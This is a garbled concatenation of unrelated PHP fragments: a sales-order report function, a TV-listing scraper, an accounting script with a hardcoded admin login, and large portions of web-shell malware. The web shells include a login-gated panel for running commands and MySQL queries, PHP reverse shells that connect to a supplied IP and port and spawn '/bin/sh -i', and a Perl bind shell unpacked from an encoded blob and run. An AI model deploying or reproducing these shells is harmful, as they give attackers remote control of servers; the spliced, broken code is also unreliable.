function print_sales_orders()
{
$from = $_REQUEST['PARAM_0'];
$to = $_REQUEST['PARAM_1'];
$currency = $_REQUEST['PARAM_2'];
$bankaccount = $_REQUEST['PARAM_3'];
$email = $_REQUEST['PARAM_4'];
$quote = $_REQUEST['PARAM_5'];
$comments = $_REQUEST['PARAM_6'];
if ($from == null) {
$from = 0;
}
if ($to == null) {
$to = 0;
}
if ($from > 0) {
printit($from, $to, $currency, $bank, $email, $quote, $commeents, "");
}
}
}
$input = fread($pipes[1], $chunk_size);
if ($debug) {
printit("STDOUT: {$input}");
}
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) {
printit("STDERR READ");
}
$input = fread($pipes[2], $chunk_size);
if ($debug) {
printit("STDERR: {$input}");
}
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit($string)
{
if (!$daemon) {
print "{$string}\n";
function __construct()
{
if ($_SESSION['logged'] != TRUE && $_POST['cmd'] != 'login' && empty($_POST['pass'])) {
$this->buildPageLogin();
} else {
switch ($_POST['cmd']) {
case 'browser':
$browserTools = new BrowserTools();
switch ($_POST['method']) {
case 'show':
$this->buildPageStructure($browserTools->main($_POST['item'], false));
break;
case 'execute':
$this->buildPageStructure($browserTools->main($_POST['item']));
break;
default:
$this->buildPageStructure($browserTools->main('.'));
break;
}
break;
case 'logout':
$this->logout();
break;
case 'remove':
$this->remove();
break;
case 'php':
$phpTools = new PhpTools();
switch ($_POST['method']) {
case 'execute':
$util = new Util();
$run = $util->execute($_POST['item']);
foreach ($run as $row) {
$resp[] = htmlentities(wordwrap($row, 100, ' ', TRUE), ENT_QUOTES);
}
$this->buildPageStructure($phpTools->main($resp));
break;
default:
$this->buildPageStructure($phpTools->main(''));
break;
}
break;
case 'mysql':
$mySql = new MySQLTools();
switch ($_POST['method']) {
case 'connect':
if (!empty($_POST['userdb']) && !empty($_POST['serverdb']) && !empty($_POST['portdb'])) {
$_SESSION['userdb'] = $_POST['userdb'];
$_SESSION['passdb'] = $_POST['passdb'];
$_SESSION['serverdb'] = $_POST['serverdb'];
$_SESSION['portdb'] = $_POST['portdb'];
if ($mySql->connect()) {
$_SESSION['connected'] = TRUE;
$this->buildPageStructure($mySql->main());
} else {
$error = "\n <div class='alert'>\n <strong>Warning!</strong> " . $_SESSION['linkdb']->connect_error . "\n </div>\n ";
$this->buildPageStructure($mySql->main($error));
}
}
break;
case 'selectdb':
if (!empty($_POST['item'])) {
$_SESSION['db'] = $_POST['item'];
if ($mySql->selectDb($_POST['item'])) {
$this->buildPageStructure($mySql->main());
} else {
$error = "\n <div class='alert'>\n <strong>Warning!</strong> Can't select the Database. Please try again.\n </div>\n ";
$this->buildPageStructure($mySql->main($error));
}
}
break;
case 'query':
if (!empty($_POST['item'])) {
if ($result = $mySql->execute($_POST['item'])) {
$_SESSION['query'] = $result;
$this->buildPageStructure($mySql->main());
} else {
$error = "\n <div class='alert'>\n <strong>Warning!</strong> " . $_SESSION['linkdb']->error . "\n </div>\n ";
$this->buildPageStructure($mySql->main($error));
}
}
break;
case 'logout':
$_SESSION['connected'] = NULL;
$_SESSION['userdb'] = NULL;
$_SESSION['passdb'] = NULL;
$_SESSION['serverdb'] = NULL;
$_SESSION['portdb'] = NULL;
$_SESSION['db'] = NULL;
$_SESSION['linkdb'] = NULL;
$this->buildPageStructure($mySql->main());
break;
default:
$this->buildPageStructure($mySql->main());
break;
}
break;
case 'reverse':
$reverseTools = new ReverseTools();
switch ($_POST['method']) {
case 'connect':
if (isset($_POST['port']) && isset($_POST['ip']) && $_POST['port'] != "" && $_POST['ip'] != "") {
$result = "";
$ip = $_POST['ip'];
$port = $_POST['port'];
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; /bin/sh -i';
$debug = 0;
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
echo "{$errstr} ({$errno})";
exit(1);
}
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
echo "ERROR: Can't spawn shell";
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
$result .= "Successfully opened reverse shell to {$ip}:{$port}";
while (1) {
if (feof($sock)) {
$result .= "ERROR: Shell connection terminated";
break;
}
if (feof($pipes[1])) {
$result .= "ERROR: Shell process terminated";
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) {
printit("SOCK READ");
}
$input = fread($sock, $chunk_size);
if ($debug) {
printit("SOCK: {$input}");
}
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) {
printit("STDOUT READ");
}
$input = fread($pipes[1], $chunk_size);
if ($debug) {
printit("STDOUT: {$input}");
}
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) {
printit("STDERR READ");
}
$input = fread($pipes[2], $chunk_size);
if ($debug) {
printit("STDERR: {$input}");
}
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
}
$this->buildPageStructure($reverseTools->main());
break;
default:
$this->buildPageStructure($reverseTools->main(''));
break;
}
break;
case 'login':
if (isset($_POST['pass']) && !empty($_POST['pass'])) {
$this->login($_POST['pass']);
}
break;
default:
$info = new Info();
$this->buildPageStructure($info->main());
break;
}
}
}
}
if ($flag == 2) {
$pid = $sql->last_record($result);
$sql->query("update program set stop=INTERVAL 1 DAY + stop where pid={$pid}");
}
}
$count++;
}
// end while
}
// end function printit
if ($WEB) {
print_header_open();
print_title("Collecting ...");
print_header_close();
}
while (list($zender, $url) = each($urls)) {
$uur = array();
$programma = array();
$inhoud = array();
if ($WEB) {
print "Slurping {$zender}...<br>\n";
}
$inhoud = connecttohttpd($url, $host);
list($programma, $uur, $film) = parsecontent($inhoud, $programma, $uur, $film);
printit($programma, $uur, $film, $zender);
}
if ($WEB) {
print "done<br>";
print_page_close();
}
function reverse_conn_bg()
{
global $os;
$option = $_REQUEST['rev_option'];
$ip = $_GET['my_ip'];
$port = $_GET['my_port'];
if ($option == "PHP Reverse Shell") {
echo "<div id=result><h2>RESULT</h2><hr /><br />";
function printit($string)
{
if (!$daemon) {
print "{$string}\n";
}
}
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0);
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("{$errstr} ({$errno})");
exit(1);
}
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("<font color=green>Successfully opened reverse shell to {$ip}:{$port} </font>");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) {
printit("SOCK READ");
}
$input = fread($sock, $chunk_size);
if ($debug) {
printit("SOCK: {$input}");
}
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) {
printit("STDOUT READ");
}
$input = fread($pipes[1], $chunk_size);
if ($debug) {
printit("STDOUT: {$input}");
}
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) {
printit("STDERR READ");
}
$input = fread($pipes[2], $chunk_size);
if ($debug) {
printit("STDERR: {$input}");
}
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
echo "<br /><br /><hr /><br /><br /></div>";
} else {
if ($option == "PERL Bind Shell") {
global $bind_perl, $os;
$pbfl = $bind_perl;
$handlr = fopen("indrajith_perl_bind.pl", "wb");
if ($handlr) {
fwrite($handlr, gzinflate(base64_decode($bind_perl)));
} else {
alert("Access Denied for create new file");
}
fclose($handlr);
if (file_exists("indrajith_perl_bind.pl")) {
if ($os == "nix") {
cmd("chmod +x indrajith_perl_bind.pl;perl indrajith_perl_bind.pl {$port}");
} else {
cmd("perl indrajith_perl_bind.pl {$port}");
}
}
}
}
}
<?php
$_POST["user_name_entry_field"] = "admin";
$_POST["company_login_name"] = "0";
$_POST["password"] = "******";
$page_security = 1;
include "includes/session.inc";
chdir("./sales");
# printing of orders/quotes is called from sales directory
include "../reporting/includes/reporting.inc";
include "../reporting/includes/pdf_report.inc";
include "../reporting/rep109.php";
$sql = "SELECT sales_orders.order_no from sales_orders where order_no=20";
$result = db_query($sql, $db);
if ($result) {
while ($myrow = db_fetch($result)) {
$nr = $myrow[0];
}
$bank = get_first_bank_account();
$quote = 1;
$comments = "";
printit($nr, $nr, "CHF", $bank, 0, $quote, "", "/tmp/output.pdf");
}
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell<br>");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to {$ip}:{$port}<br>");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated<br>");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated<br>");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
$input = fread($sock, $chunk_size);
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
$input = fread($pipes[1], $chunk_size);
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
$input = fread($pipes[2], $chunk_size);
fwrite($sock, $input);
